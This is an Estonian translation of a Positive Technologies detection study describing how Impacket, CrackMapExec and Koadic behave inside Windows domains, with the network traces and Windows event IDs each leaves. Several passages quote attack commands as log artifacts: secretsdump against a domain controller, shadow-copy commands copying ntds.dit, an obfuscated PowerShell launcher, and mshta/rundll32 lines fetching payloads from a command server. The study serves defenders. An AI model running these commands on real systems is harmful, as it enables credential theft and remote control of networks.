Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu

Iga aastaga kasvab rĂŒnnakute arv ettevĂ”tetes: nĂ€iteks 2017. aastal registreeriti 13% rohkem unikaalseid intsidente kui 2016. aastal, ja 2018. aasta lĂ”ikes — 27% rohkem intsidente, kui eelneval perioodil. Sealhulgas olukordades, kus peamine tööriist on operatsioonisĂŒsteem Windows. Aastatel 2017–2018 rĂŒndasid rĂŒhmitused APT Dragonfly, APT28, APT MuddyWater tĂ”i rĂŒnnakud Euroopa, PĂ”hja-Ameerika ja Saudi Araabia valitsus- ja sĂ”javĂ€eorganisatsioonidele. Selleks kasutati kolme tööriista — Impacket, CrackMapExec ja Koadic. Nende lĂ€htekood on avatud ja saadaval GitHubis.

Oluline on mĂ€rkida, et neid tööriistu ei kasutata algse sisenemise jaoks, vaid rĂŒnnaku arendamiseks infrastruktuuri sees. KĂŒberkurjategijad kasutavad neid rĂŒnnaku erinevates etappides, mis jĂ€rgivad perimeetri ĂŒletamist. Sellega on keeruline tuvastada, ja sageli ainult tehnoloogia kompromiteerimise jĂ€lgede tuvastamiseks vĂ”rgu andmeliikluses vĂ”i tööriistade abil, mis vĂ”imaldavad tuvastada kĂŒberkurjategija aktiivseid tegevusi pĂ€rast selle infrastruktuuri sisenemist. Tööriistad pakuvad palju funktsioone — failide edastamisest kuni registriga suhtlemise ja kaugkĂ€sitsuse tĂ€itmiseni. Me viisime lĂ€bi nende tööriistade uurimise, et mÀÀrata nende vĂ”rgu aktiivsus.

Mida me pidime tegema:

  • MĂ”ista, kuidas töötab hĂ€kkerite tööriistade komplekt.Saada teada, mida rĂŒndajad vajavad ekspluateerimiseks ja milliseid tehnoloogiaid nad saavad kasutada.
  • Leida see, mis ei tuvastata infotech’ide turbevahendite abil rĂŒnnaku algstaadiumis.Uurimise etapp vĂ”ib olla vahele jĂ€etud, kas seetĂ”ttu, et rĂŒndaja on sisemine kĂŒberkurjategija vĂ”i seetĂ”ttu, et rĂŒndaja kasutab varjatuks jÀÀnud infrastruktuuri haavatavust. Tekib vĂ”imalus taastada kogu tema tegevuste ahel, millest tuleneb soov tuvastada edasine liikumine.
  • Eemaldada valehĂ€iret rĂŒnnaku tuvastamise vahenditest. Ei tohi unustada, et ĂŒheainsa luureandmete pĂ”hjal teatud toimingute tuvastamisel vĂ”ivad sageli esineda vead. Tavaliselt on infrastruktuuris piisavalt meetodeid, mis esmapilgul ei eristu legitiimsetest, et saada mingit teavet.

Kuid mida annavad rĂŒndajatele need tööriistad? Kui see on Impacket, saavad kurjategijad suure moodulite teegi, mida saab kasutada erinevates rĂŒnnakuetappides pĂ€rast perimeetri ĂŒletamist. Paljud tööriistad kasutavad Impacket'i mooduleid enda sees — nĂ€iteks Metasploit. Seal on dcomexec ja wmiexec kaugkĂ€skude tĂ€itmiseks, secretsdump mĂ€lu kasutajakontode hankimiseks, mis on lisatud Impacket'ist. LĂ”ppkokkuvĂ”ttes tagab selle teegi tegevuse Ă”ige tuvastamine ka kĂ”rvaltoimete avastamise.

CrackMapExec (vÔi lihtsalt CME) loojad ei ole ilmaasjata kirjutanud «Powered by Impacket». Lisaks sellele sisaldab CME valmis funktsionaalsust populaarsete stsenaariumide jaoks: seal on Mimikatz paroolide vÔi nende hashide hankimiseks, Meterpreter vÔi Empire agendi sisestamine kaugtÀide jaoks ning Bloodhound pardal.

Meie kolmas valitud tööriist on Koadic. See on ĂŒsna uus, esitlemine aset leidis rahvusvahelisel hĂ€kkerikonverentsil DEFCON 25 2017. aastal ja eristub ebatavalise lĂ€henemisega: töö kaudu HTTP, Java Script ja Microsoft Visual Basic Script (VBS). Seda lĂ€henemist nimetatakse living off the land: tööriist kasutab Windowsisse sisseehitatud sĂ”ltuvuste ja raamatukogude komplekti. Loojad nimetavad seda COM Command & Control, vĂ”i C3.

IMPACKET

Impacket'i funktsionaalsus on vĂ€ga ulatuslik, alustades luuretegevusest AD-s ja andmete kogumisest sisemistelt MS SQL serveritelt, lĂ”petades autentimisandmete hankimise tehnikatega: sealhulgas SMB relay rĂŒnnak ja ntds.dit faili hankimine domeeni kontrollerilt, mis sisaldab kasutajate paroolide hashe. Samuti tĂ€idab Impacket kaugkĂ€sklusi, kasutades neli erinevat meetodit: lĂ€bi WMI, Windowsi ajakava haldamise teenuse, DCOM ja SMB, ning selleks on vajalikud autentimisandmed.

Secretsdump

Vaatame nĂŒĂŒd secretsdumpi. See on moodul, mille sihtmĂ€rkideks vĂ”ivad olla nii kasutajamasinad kui ka domeenikontrollerid. Selle abil on vĂ”imalik saada koopiaid LSA, SAM, SECURITY, NTDS.dit mĂ€lupiirkondadest, mistĂ”ttu seda vĂ”idakse nĂ€ha rĂŒnnaku erinevatel etappidel. Mooduli töö esimene samm on autentimine SMB kaudu, mille jaoks on vajalik kas kasutaja parool vĂ”i selle rĂ€simĂ€rk, et teostada automaatne Pass the Hash rĂŒnnak. SeejĂ€rel saadetakse pĂ€ring Service Control Manageri (SCM) juurdepÀÀsu avamiseks ja registrisse juurdepÀÀsu saamiseks winreg protokolli kaudu, mille abil rĂŒndaja saab teada huvipakkuva registrivĂ”ti andmed ja saada tulemused SMB kaudu.

Joonisel 1 nĂ€eme, kuidas winreg protokolli kasutamisel toimub juurdepÀÀsu saamine LSA registrivĂ”tmele. Selleks kasutatakse DCERPC kĂ€sku opcode 15 — OpenKey.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 1. RegistrivÔtme avamine winreg protokolli kaudu

Edasi, kui juurdepÀÀs registrivÔtmele on saadud, salvestatakse vÀÀrtused SaveKey kÀsuga opcode 20. Impacket teostab seda vÀga spetsiifiliselt. Ta salvestab vÀÀrtused faili, mille nimi on 8 juhusliku tÀhega ja millele on lisatud .tmp. Lisaks toimub edasine faili vÀljavÔtt SMB kaudu System32 kaustast (joonis 2).

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 2. RegistrivÔtme saamise skeem eemalt

Seega on sarnase tegevuse tuvastamine vÔrgus vÔimalik, jÀlgides pÀringute tegemist kindlatele registrivÔtme harudele winreg protokolli kaudu, spetsiifilisi nimesid, kÀske ja nende jÀrjekorda.

Samuti jĂ€tab see moodul jĂ€lgi Windowsi sĂŒndmuste logisse, mis aitab seda hĂ”lpsasti avastada. NĂ€iteks kĂ€su tĂ€itmisel

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso\/Administrator:@DC

nĂ€eme Windows Server 2016 logis jĂ€rgmist vĂ”tme sĂŒndmuste jĂ€rjekorda:

1. 4624 — kauglogimine.
2. 5145 — kaugteenuse winreg juurdepÀÀsu kontroll.
3. 5145 — failile System32 kaustas juurdepÀÀsu kontroll. Failil on eelpool mainitud juhuslik nimi.
4. 4688 — protsessi cmd.exe loomine, mis kĂ€ivitab vssadmin:

“C:windowssystem32cmd.exe" \/Q \/c echo c:windowssystem32cmd.exe \/C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe \/Q \/c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 — protsessi loomine kĂ€suga:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 — protsessi loomine kĂ€suga:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 — protsessi loomine kĂ€suga:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet > %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Nagu paljude post-kasutusasjade tööriistade puhul, on ka Impacketil mooduleid kaugete kÀsu tÀitmiseks. Peatume smbexecitel, mis annab interaktiivse kÀsurea kaugmasinas. Selle mooduli jaoks on samuti vajalik autentimine SMB kaudu kas parooli vÔi selle rÀsi abil. Joonisel 3 nÀeme selle tööriista töö nÀidet, antud juhul on see kohaliku administraatori konsool.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 3. Interaktiivne smbexec konsool

Smbexeci töö esimene etapp pÀrast autentimist on SCM avamine kÀsuga OpenSCManagerW (15). PÀring on tÀhelepanuvÀÀrne: sellel on vÀli MachineName vÀÀrtusega DUMMY.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 4. PĂ€ring teenuste juhtimise halduri avamiseks

JĂ€rgmisena luuakse teenus kĂ€suga CreateServiceW (12). Smbexeci puhul nĂ€eme iga kord samu kĂ€skude koostamise loogikaid. Joonisel 5 on roheline vĂ€rviga tĂ€histatud muutumatud kĂ€su parameetrid, kollasega on tĂ€histatud need, mida rĂŒndaja saab muuta. Pole raske mĂ€rgata, et tĂ€itmise faili nimi, selle kaust ja vĂ€ljundfail on muutmiseks saadaval, kuid ĂŒlejÀÀnud muudatused on keerulisemad, ilma et Impacketi mooduli tööloogika oleks hĂ€iritud.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 5. Teenuse loomise pÀring teenuste juhtimise halduse kaudu

Smbexec jĂ€tab ka Windowsi sĂŒndmuste ĆŸurnali selged jĂ€ljed. Windows Server 2016 ĆŸurnalist interaktiivse kĂ€sureaga kĂ€su ipconfig nĂ€eme jĂ€rgmist olulist sĂŒndmustekeeni:

1. 4697 — teenuse seadistamine ohvrimasinas:

%COMSPEC% /Q /c echo cd > 127.0.0.1C$__output 2>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 — protsessi cmd.exe loomine punktis 1 toodud argumentidega.
3. 5145 — Ă”iguste kontrollimise kontrollimine faili __output juures kataloogis C$.
4. 4697 — teenuse seadistamine ohvrimasinas.

%COMSPEC% /Q /c echo ipconfig > 127.0.0.1C$__output 2>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 – cmd.exe protsessi loomine punkti 4 argumentidega.
6. 5145 – juurdepÀÀsuĂ”iguste kontroll failile __output kaustas C$.

Impacket on tööriistade arendamise aluseks rĂŒnnakute jaoks. See toetab peaaegu kĂ”iki protokolle Windowsi infrastruktuuris ning omab oma iseloomulikke jooni. Siia kuuluvad konkreetsed winreg-pĂ€ringud, SCM API kasutamine iseloomulikuga kĂ€sus, failide nimede formaat ja SMB jagamine SYSTEM32.

CRACKMAPEXEC

CME tööriist on loodud eeskĂ€tt automatiseerima rutiinseid tegevusi, mida rĂŒndaja peab tegema vĂ”rgu sees edasiviimiseks. See vĂ”imaldab töötada koos tuntud Empire agendi ja Meterpreteriga. KĂ€skude varjatud tĂ€itmiseks vĂ”ib CME neid obfuskatsiooniga muuta. Kasutades Bloodhoundi (erinev tööriist luureks), saab rĂŒndaja automatiseerida domeeni administraatori aktiivse sessiooni otsimist.

Bloodhound

Bloodhound iseseisva tööriistana vĂ”imaldab nĂ”utada edasist luurimist vĂ”rgus. See kogub teavet kasutajatest, masinatest, gruppidest, sessioonidest ja tarnitakse PowerShelli skripti vĂ”i binaarsete failidena. Andmete kogumiseks kasutatakse LDAP-i vĂ”i SMB-pĂ”hiseid protokolle. CME integratsioonimoodul vĂ”imaldab laadida Bloodhoundi sihtmasinale, kĂ€ivitada ja saada kogutud andmed pĂ€rast tĂ€itmist, automatiseerides tegevusi sĂŒsteemis ja tehes neid vĂ€hem tĂ€helepandavaks. Bloodhoundi graafiline liides esitab kogutud andmeid graafidena, vĂ”imaldades leida lĂŒhim tee rĂŒndaja masinast domeeni administraatorini.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joon. 6. Bloodhoundi liides

Sihtmasinasse kĂ€ivitamiseks loob moodul ĂŒlesande, kasutades ATSVC ja SMB-d. ATSVC on Windowsi ĂŒlesannete planeerija liidese töötluseks. CME kasutab selle funktsiooni NetrJobAdd (1) ĂŒlesannete loomiseks vĂ”rgus. See, mida CME moodul edastab, on nĂ€idatud joonisel 7: see on cmd.exe kĂ€su ja obfuskatsioonikoodi vĂ€ljakutse XML-formaadis argumentidena.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joon. 7. Ülesande loomine CME kaudu

PĂ€rast ĂŒlesande tĂ€itmiseks edastamist kĂ€ivitab sihtmasin ise Bloodhoundi ning seda vĂ”ib liikluses nĂ€ha. Moodulile on iseloomulikud LDAP-pĂ€ringud standardsete gruppide, kĂ”igi masinate ja kasutajate loendi, samuti aktiivsete kasutajate sessioonide teabe saamiseks SRVSVC NetSessEnum pĂ€ringu kaudu.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 8. Aktiivsete sessioonide nimekirja saamine SMB kaudu

Lisaks kaasneb verekoera kĂ€ivitamisega ohvrimasinas koos auditi sisselĂŒlitamisega sĂŒndmus, mille ID on 4688 (protsessi loomine) ja protsessi nimi «C:WindowsSystem32cmd.exe». Eriti tĂ€helepanuvÀÀrsed on kĂ€surea argumendid:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , 
 , 40,41 )-jOIN'' ) "

Enum_avproducts

Modul enum_avproducts on oma funktsionaalsuse ja rakenduse poolest vĂ€ga huvitav. WMI vĂ”imaldab kasutada WQL-pĂ€ringute keelt erinevate Windows objektide andmete saamiseks, mida see CME moodul tegelikult kasutab. See loob pĂ€ringud AntiSpywareProduct ja AntiМirusProduct klasside kohta, et saada teavet ohutusvahendite kohta, mis on ohvrimasinas installitud. Vajalikud andmed hankimiseks teeb modul ĂŒhenduse nimepinna rootSecurityCenter2, seejĂ€rel vormib WQL-pĂ€ringu ja saab vastuse. Joonisel 9 on nĂ€idatud selliste pĂ€ringute ja vastuste sisu. Meie nĂ€ites leiti Windows Defender.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 9. Enum_avproducts mooduli vÔrgutegevus

Sageli vĂ”ib WMI audit (Trace WMI-Activity), kus leidub kasulikku teavet WQL-pĂ€ringute kohta, olla vĂ€lja lĂŒlitatud. Kuid kui see on sisse lĂŒlitatud, jÀÀb enum_avproducts skripti kĂ€ivitamisel sĂŒndmus ID-ga 11. See sisaldab nimekasutaja, kes saatis pĂ€ringu, ja nimepinda rootSecurityCenter2.

Iga CME mooduli kohta leiti oma artefaktid, olgu need siis spetsiifilised WQL-pĂ€ringud vĂ”i teatud tĂŒĂŒpi ĂŒlesande loomine ĂŒlesannete ajakava, mis sisaldab obfuskeeringut ning on Bloodhoundile iseloomulik tegevus LDAP ja SMB-s.

KOADIC

Koadici eripĂ€ra on Windowsi integreeritud JavaScripti ja VBScripti tĂ”lgendajate kasutamine. SeetĂ”ttu jĂ€rgib see elavate maaressursside suundumust - see tĂ€hendab, et tal ei ole vĂ€liseid sĂ”ltuvusi ja ta kasutab Windowsi standardseid vahendeid. See on tĂ€ieĂ”iguslik juhtimis- ja kontrollimisvahend (CnC), kuna pĂ€rast nakatumist installitakse masinasse "implantaadi", mis vĂ”imaldab selle ĂŒle kontrolli teostada. Sellist masinat, Koadici terminoloogias, nimetatakse "zombiks". Privileegide puudumisel ohvri poolel on Koadicil vĂ”imalik neid tĂ”sta, kasutades kontohalduse kontrolli ĂŒmbersĂ”itmise meetodeid (UAC bypass).

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 10. Koadici kÀsurea liides

Ohver peab ise algatama suhtluse Command & Control serveriga. Selleks peab ta pöörduma eelnevalt ettevalmistatud URI poole ja saama Koadic'i pĂ”hikeha ĂŒhe etappide kaudu. Joonisel 11 on nĂ€idatud etapp mshta jaoks.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 11. Sessiooni algatamine CnC-serveriga

Muutuja WS vastuses annab teada, et tĂ€itmine toimub lĂ€bi WScript.Shell, ning muutujad STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE sisaldavad olulist teavet praeguse sessiooni parameetrite kohta. See on esimene pĂ€ring-vastus paari HTTP-ĂŒhenduses CnC-serveriga. JĂ€rgmised pĂ€ringud on otseselt seotud kutsutud moodulite (implantaate) funktsionaalsusega. KĂ”ik Koadic'i moodulid töötavad ainult aktiivse sessiooniga CnC-ga.

Mimikatz

Nii nagu CME töötab Bloodhoundiga, töötab Koadic Mimikatziga kui eraldi programmiga ning selle kÀivitamiseks on mitu viisi. Allpool on esitatud pÀring-vastus paar Mimikatz'i implantatsiooni laadimiseks.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 12. Mimikatz'i edastamine Koadic'isse

VĂ”ime mĂ€rgata, kuidas pĂ€ringu URI formaat on muutunud. See sisaldab vÀÀrtust muutujale csrf, mis vastutab valitud mooduli eest. Ärge pöörake tĂ€helepanu selle nimele; me kĂ”ik teame, et CSRF tĂ€histab tavaliselt midagi muud. Vastus sisaldas taas Koadic'i pĂ”hikeha, millele oli lisatud Mimikatz'iga seotud kood. See on piisavalt suur, seega vaatame olulisemaid punkte. Meie ees on base64 kooditud Mimikatz'i teek, serialiseeritud .NET klass, mis seda sĂŒstib, ning argumentide komplekt Mimikatz'i kĂ€ivitamiseks. TĂ€itmise tulemus edastatakse avatud kujul ĂŒle vĂ”rgu.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 13. Mimikatz'i tÀitmise tulemus kaugmasinas

Exec_cmd

Koadic'il on ka moodulid, mis suudavad kaugelt kÀske tÀita. Siin nÀeme endiselt tuttavat URI genereerimise meetodit ja tuntud muutujaid sid ja csrf. Exec_cmd mooduli korral lisatakse kehasse kood, mis suudab tÀita shell-kÀske. Allpool on toodud selline kood, mis on CnC-serveri HTTP-vastus.

Kuidas tuvastada rĂŒnnakud Windowsi infrastruktuuri: uurime hĂ€kkerite tööriistu
Joonis 14. exec_cmd implantatsiooni kood

Muutuja GAWTUUGCFI tuttava atribuudiga WS on vajalik koodi tĂ€itmiseks. Selle abil kutsub implant shell'i, töötledes kahte koodiharu — shell.exec, mis tagastab vĂ€ljundvoo, ja shell.run, mis ei tagasta.

Koadic ei ole tĂŒĂŒpiline tööriist, kuid sellel on oma artefaktid, mille pĂ”hjal vĂ”ib seda leida legaalses liikluses:

  • eriline HTTP-pĂ€ringute koostamine,
  • winHttpRequests API kasutamine,
  • WScript.Shell objekti loomine ActiveXObjecti kaudu,
  • suur tĂ€idetav keha.

Algne ĂŒhendus kĂ€ivitab etapid, vĂ”imaldades selle aktiivsuse tuvastamist Windowsi sĂŒndmuste kaudu. Mshta puhul on see sĂŒndmus 4688, mis nĂ€itab protsessi loomist kĂ€ivitamisparameetriga:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic'i kĂ€imise ajal vĂ”ib nĂ€ha ka muid sĂŒndmusi 4688 koos atribuutidega, mis iseloomustavad seda vĂ€ga hĂ€sti:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

JĂ€reldused

Trendi living off the land populaarsus kasvab kurjategijate seas. Nad kasutavad Windowsis sisseehitatud tööriistu ja mehhanisme oma vajaduste rahuldamiseks. NĂ€eme, et populaarsed tööriistad Koadic, CrackMapExec ja Impacket, mis jĂ€rgivad seda pĂ”himĂ”tet, esinevad ĂŒha enam APT aruannetes. Nende tööriistade forkkide arv GitHubis kasvab samuti, uusi ilmub jĂ€rjest (hetkel on neid juba umbes tuhat). Trend on populaarne oma lihtsuse tĂ”ttu: kurjategijad ei vaja kolmandate osapoolte tööriistu, need on juba ohvrite masinates ja aitavad kaitsemehhanisme ĂŒletada. Me keskendume vĂ”rgusuhte uurimisele: iga eespool mainitud tööriist jĂ€tab oma jĂ€ljed vĂ”rgu liikluses; nende pĂ”hjalik uurimine on vĂ”imaldanud meil Ă”petada meie toodet PT Network Attack Discovery need tuvastama, mis aitab lĂ”puks uurida kogu kĂŒberintsidentide ahelat, milles nad osalevad.

Autorid:

  • Anton Tyurin, ekspertteenuste juht, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, ekspert, PT Expert Security Center, Positive Technologies

Allikas: habr.com

Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster